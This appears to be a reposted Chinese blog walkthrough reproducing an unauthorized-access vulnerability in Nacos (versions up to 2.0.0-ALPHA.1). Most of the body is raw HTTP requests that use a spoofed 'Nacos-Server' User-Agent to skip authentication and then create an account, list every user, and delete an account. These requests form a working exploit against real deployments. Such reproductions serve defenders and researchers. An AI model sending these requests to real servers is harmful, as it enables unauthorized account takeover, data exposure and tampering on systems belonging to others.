Nacos 未授權漏洞復現

本文轉載自查看原文 2021-02-04 13:52 1403 漏洞復現/ Web安全/ 技巧

簡介

影響：
未授權獲得相關服務配置，泄露大量配置敏感信息

影響版本
Nacos <= 2.0.0-ALPHA.1

漏洞復現

post方式新增用戶：

POST /nacos/v1/auth/users?username=yangy&password=yangy HTTP/1.1
Host: XXX
User-Agent: Nacos-Server
Content-Length: 0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

登錄口進行登錄，確認用戶可登陸：

get方式獲得其他用戶信息：

GET /nacos/v1/auth/users?pageNo=1&pageSize=999 HTTP/1.1
Host: XXX
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

delete方式進行刪除：

DELETE /nacos/v1/auth/users?username=yangy HTTP/1.1
Host: XXX
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

再次查詢用戶確認已經刪除：

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 redis未授權訪問漏洞復現 JBOSS未授權訪問漏洞復現 Redis未授權訪問漏洞復現與利用 ldap未授權訪問漏洞復現 mongodb未授權訪問漏洞復現 Hadoop YARN ResourceManager 未授權訪問漏洞復現 Jira未授權SSRF漏洞復現(CVE-2019-8451) 【漏洞復現】CVE-2021-22205 GitLab 未授權RCE 淺談未授權漏洞——VNC未授權 CVE-2020-14882&14883weblogic未授權命令執行漏洞復現